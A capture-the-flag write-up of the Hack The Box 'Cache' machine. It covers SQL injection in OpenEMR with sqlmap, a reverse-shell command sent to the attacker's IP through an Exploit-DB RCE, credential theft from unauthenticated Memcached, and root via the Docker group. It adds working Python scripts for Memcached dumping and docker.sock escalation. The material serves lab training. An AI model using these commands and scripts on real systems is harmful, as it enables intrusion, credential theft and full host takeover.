Cache-HTB

cY83rR0H1t
6 min read · May 6, 2021

Summary

Cache is a medium-difficulty Hack The Box machine. For the user part we enumerated port 80; the author's page hinted at a second hostname, hms.htb, which runs a vulnerable OpenEMR. Using sqlmap against a SQL injection in the patient portal we extracted a username and password hash from the database, cracked it, and used a known authenticated OpenEMR remote code execution exploit to get a reverse shell as www-data. A client-side JavaScript login check on cache.htb leaks the password of the local user ash. Memcached was listening on port 11211 without authentication and held the password of the local user luffy. Luffy is a member of the docker group, which we abused to get a root shell on the host.

Foothold

After the port scan, we discovered two open ports: 22 (SSH) and 80 (HTTP).

Note: command and flag explanation

  • -sC: run the default Nmap scripts.
  • -sV: service version detection.
  • -oA: write the output in all three major formats (normal, grepable, XML) with the given basename.
#Command
$ nmap -sC -sV -oA nmap 10.10.10.188

Gobuster found a /jquery directory. It contains functionality.js, a client-side login check that hard-codes the expected username and password in the page's JavaScript, so anyone who fetches the file can read them. We will use this password later.

#Command
$ curl http://cache.htb/jquery/functionality.js

$(function(){

    var error_correctPassword = false;
    var error_username = false;

    // The expected password is compared in the browser, so it is visible to anyone who reads the script.
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
        }
    }
    // Same for the username.
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
        }
    }
    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
        checkCorrectPassword();
        error_username = false;
        checkCorrectUsername();
        if(error_correctPassword == false && error_username ==false){
            return true;
        }
        else{
            return false;
        }
    });

});
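Reading the script by hand is enough on one box, but the check above follows a pattern that can be searched for automatically. The Python below is an added example, not part of the original write-up: it maps each JavaScript variable that reads a form field to that field's name and reports any string literal the variable is compared against. The sample script it runs on is constructed here to match the shape of functionality.js; the fetch_js() helper and its URL argument are assumptions for pointing it at a live target.

```python
"""Extract credentials hard-coded in a client-side login check (added example)."""
import re
import urllib.request

# Constructed sample with the same shape as the functionality.js found on cache.htb.
SAMPLE_JS = r'''
$(function(){
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){ alert("Password didn't Match"); }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){ alert("Username didn't Match"); }
    }
});
'''

# var <name> = $("#<field>").val();  ->  which form field a JS variable holds
FIELD_RE = re.compile(r'var\s+(\w+)\s*=\s*\$\(\s*["\']#(\w+)["\']\s*\)\.val\(\)')
# <name> != "literal" / <name> === 'literal'  ->  a comparison against a constant
CMP_RE = re.compile(r'(\w+)\s*[!=]==?\s*(["\'])((?:\\.|(?!\2).)*)\2')


def find_hardcoded_credentials(js_source):
    """Return {form_field: literal} for every form field compared to a string constant."""
    var_to_field = dict(FIELD_RE.findall(js_source))
    found = {}
    for var, _quote, literal in CMP_RE.findall(js_source):
        if var in var_to_field:
            found[var_to_field[var]] = literal
    return found


def fetch_js(url):
    """Download a script from the target (assumed helper; needs network access)."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Against a live target: find_hardcoded_credentials(fetch_js("http://cache.htb/jquery/functionality.js"))
    print(find_hardcoded_credentials(SAMPLE_JS))
```

Only variables that were assigned from a form field are reported, so ordinary string comparisons elsewhere in a script do not produce noise; minified scripts that inline the `.val()` call into the comparison need a second pattern.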

Gobuster also found /author.html. The author page hints at a new hostname, HMS, so we added hms.htb to /etc/hosts (same IP, 10.10.10.188) and opened http://hms.htb in the browser, which serves an OpenEMR login page.


The published vulnerability report for this OpenEMR version describes a SQL injection in add_edit_event_user.php: the eid, userid and pid parameters reach the SQL query unsanitised. Exploiting it normally requires authentication to the Patient Portal, but it can be exploited without credentials when combined with the Patient Portal authentication bypass described in the same report.

Appending a single quote to the pid parameter produces a SQL error, confirming the injection point.

http://hms.htb/portal/add_edit_event_user.php?pid='

We captured the request in Burp, including the portal session cookies, and saved it to a file, cache.req, so that sqlmap can replay it.

Running sqlmap on the saved request (first with --dbs) showed an openemr database; we then dumped its table names.

#Command
$ sqlmap -r cache.req --threads=10 -D openemr --tables

Among the tables is users_secure, which holds the OpenEMR login hashes. We dump it.

#Command
$ sqlmap -r cache.req --threads=10 -D openemr -T users_secure --dump

This gives a username, openemr_admin, and its password hash. We cracked the hash with John the Ripper and the rockyou wordlist.

#Command
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash_password

With the username openemr_admin and the recovered password (xxxxx) we log in to the OpenEMR portal on hms.htb.

We are now in the administrator interface. OpenEMR has a known authenticated remote code execution exploit, available on Exploit-DB as 45161, which takes valid credentials and a command to run.

Reference: https://www.exploit-db.com/exploits/45161

We run it according to its usage, with a bash reverse shell as the command (10.10.14.46 is our attacking machine):

#Command
$ python 45161.py http://hms.htb/ -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.46/1337 0>&1'


Before running the exploit we start a Netcat listener on port 1337; the reverse shell arrives as www-data. We upgrade it to a proper PTY and then switch to ash with su, using the password found earlier in http://cache.htb/jquery/functionality.js.

Username: ash, Password: H@v3_fun

#Command
$ rlwrap nc -lvnp 1337
$ python3 -c 'import pty;pty.spawn("/bin/bash");'

Privilege escalation via Docker

Running ss -nlt to list listening TCP sockets, we find port 11211 open on localhost, the default port of Memcached.

Ash cannot log in to MySQL, so a mysqldump is not possible; besides, the database is unlikely to contain any passwords other than OpenEMR's.

The only suspicious port is TCP/11211. Memcached's text protocol has no authentication, so any local user who can reach the port can list and read every cached key. The enumeration I found documented for it: connect with telnet, check the version, list the active slabs with stats slabs (one slab is active here), then list the items with stats items (every item is in slab 1). The key names in a slab can be listed with stats cachedump (slab 1 here), and each key is read with get.

The user key holds the username luffy and the passwd key holds the password 0n3_p1ec3.

#Command
$ telnet 127.0.0.1 11211
version
stats slabs
stats items
get user
get passwd
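The same enumeration as a script, added here as an example and not taken from the original write-up: it speaks the Memcached text protocol over a plain socket, walks stats items to find the slab IDs, lists each slab's keys with stats cachedump, and fetches every key with a single get. Host and port default to the box's local listener; the reply samples used to exercise the parsers are constructed to match the responses seen above.

```python
"""Enumerate and dump every key from an unauthenticated Memcached server (added example)."""
import re
import socket

# Constructed replies in the shape Memcached returns them, used to exercise the parsers offline.
SAMPLE_STATS_ITEMS = "STAT items:1:number 2\r\nSTAT items:1:age 240\r\nEND\r\n"
SAMPLE_CACHEDUMP = "ITEM user [5 b; 0 s]\r\nITEM passwd [9 b; 0 s]\r\nEND\r\n"
SAMPLE_GET = "VALUE user 0 5\r\nluffy\r\nVALUE passwd 0 9\r\n0n3_p1ec3\r\nEND\r\n"


def send_command(sock, line, terminator=b"END\r\n"):
    """Send one text-protocol command and read until the expected terminator (or an ERROR line)."""
    sock.sendall(line.encode() + b"\r\n")
    data = b""
    while not data.endswith(terminator) and not data.endswith(b"ERROR\r\n"):
        chunk = sock.recv(4096)
        if not chunk:
            break
        data += chunk
    return data.decode(errors="replace")


def parse_slab_ids(stats_items_reply):
    """'STAT items:<slab>:<name> <value>' lines -> sorted list of slab IDs."""
    return sorted({int(s) for s in re.findall(r"^STAT items:(\d+):", stats_items_reply, re.M)})


def parse_cachedump(cachedump_reply):
    """'ITEM <key> [<bytes> b; <expiry> s]' lines -> list of key names."""
    return re.findall(r"^ITEM (\S+) \[", cachedump_reply, re.M)


def parse_get(get_reply):
    """'VALUE <key> <flags> <bytes>' followed by the data line -> {key: value}."""
    values, lines, i = {}, get_reply.split("\r\n"), 0
    while i < len(lines):
        parts = lines[i].split()
        if len(parts) >= 4 and parts[0] == "VALUE":
            values[parts[1]] = lines[i + 1]  # data is on the next line (values containing CRLF are not handled)
            i += 2
        else:
            i += 1
    return values


def dump_memcached(host="127.0.0.1", port=11211):
    """Connect, enumerate slabs -> keys -> values, and return everything as a dict."""
    with socket.create_connection((host, port), timeout=5) as sock:
        version = send_command(sock, "version", terminator=b"\r\n").strip()
        slabs = parse_slab_ids(send_command(sock, "stats items"))
        keys = []
        for slab in slabs:
            # a limit of 0 asks for every item in the slab
            keys += parse_cachedump(send_command(sock, f"stats cachedump {slab} 0"))
        values = parse_get(send_command(sock, "get " + " ".join(keys))) if keys else {}
    return {"version": version, "slabs": slabs, "keys": keys, "values": values}


if __name__ == "__main__":
    for key, value in dump_memcached()["values"].items():
        print(f"{key} = {value}")
```

On the box this prints the user and passwd keys. Two caveats: stats cachedump is capped at roughly 2 MB of output per call, so a busy cache may need per-slab limits, and newer Memcached builds can disable cachedump entirely, in which case lru_crawler metadump all is the replacement.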


We can now SSH in as luffy with the password 0n3_p1ec3.

#Command
$ ssh luffy@cache.htb

Running id shows that luffy is a member of the docker group. Membership of that group grants access to the Docker daemon socket, and whoever controls the daemon can start a container that bind-mounts the host's root filesystem and runs as root inside it, so this is equivalent to root on the host. We need a local image to run; docker images lists them (docker ps lists containers, not images), and 2ca708c1c9cc is the image ID we use.


The final step is to run that image with the host root bind-mounted at /mnt and chroot into it. The container process runs as root, so the chroot shell is a root shell on the host filesystem (/root/root.txt is readable from it).

#Command
$ docker run -v /:/mnt --rm -it 2ca708c1c9cc chroot /mnt sh
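The docker client is only a convenience here; what the docker group really grants is write access to /var/run/docker.sock. As an added example (not code from the write-up), the script below does the same escalation by talking to the Docker Engine API directly with the Python standard library: it creates a container from the image ID found above with the host's / bind-mounted at /mnt, runs a command inside a chroot of it as root, collects the output and removes the container. The socket path, image ID and command are parameters; the framed log sample is constructed.

```python
"""Run a command as root on the host through the Docker daemon socket (added example)."""
import http.client
import json
import socket
import struct

DOCKER_SOCK = "/var/run/docker.sock"  # group-writable by 'docker', which is what luffy's membership buys


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client over a Unix domain socket instead of TCP."""

    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def build_create_body(image, host_cmd, host_root="/"):
    """Container spec: bind-mount the host root at /mnt and run host_cmd inside a chroot of it.
    No 'User' is set, so the process is uid 0, and the bind mount maps that straight to host root."""
    return {
        "Image": image,
        "Cmd": ["chroot", "/mnt", "/bin/sh", "-c", host_cmd],
        "HostConfig": {"Binds": [f"{host_root}:/mnt"]},
    }


def demux_logs(raw):
    """Decode the framed stream from /containers/{id}/logs: each frame is an 8-byte header
    (1 byte stream type, 3 bytes padding, 4-byte big-endian payload length) plus the payload."""
    chunks, pos = [], 0
    while pos + 8 <= len(raw):
        _stream_type, size = struct.unpack(">BxxxI", raw[pos:pos + 8])
        chunks.append(raw[pos + 8:pos + 8 + size])
        pos += 8 + size
    return b"".join(chunks).decode(errors="replace")


def api(conn, method, path, body=None):
    """One Docker Engine API call; raises on a non-2xx status."""
    payload = json.dumps(body) if body is not None else None
    headers = {"Content-Type": "application/json"} if payload else {}
    conn.request(method, path, body=payload, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    if resp.status >= 300:
        raise RuntimeError(f"{method} {path} -> {resp.status}: {data.decode(errors='replace')}")
    return data


def run_on_host(image, host_cmd, sock_path=DOCKER_SOCK):
    """Create, start and wait for the container, return its combined stdout/stderr, then remove it."""
    conn = UnixHTTPConnection(sock_path)
    created = json.loads(api(conn, "POST", "/containers/create", build_create_body(image, host_cmd)))
    cid = created["Id"]
    try:
        api(conn, "POST", f"/containers/{cid}/start")
        api(conn, "POST", f"/containers/{cid}/wait")
        return demux_logs(api(conn, "GET", f"/containers/{cid}/logs?stdout=1&stderr=1"))
    finally:
        api(conn, "DELETE", f"/containers/{cid}?force=1")


if __name__ == "__main__":
    # Image ID from the box; the command is the first thing to check after escalating.
    print(run_on_host("2ca708c1c9cc", "id; cat /root/root.txt"))
```

The request body is the same thing the docker run line above sends to the daemon; seeing it spelled out makes clear that there is no privilege check beyond socket access, which is why the docker group should be treated as root when auditing a host.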


cY83rR0H1t

MSc CyberSecurity |Cybersecurity researcher | OSCP | CRTO | CRTP |eCPPTv2 | eJPT | Hack The Box player | CTF player |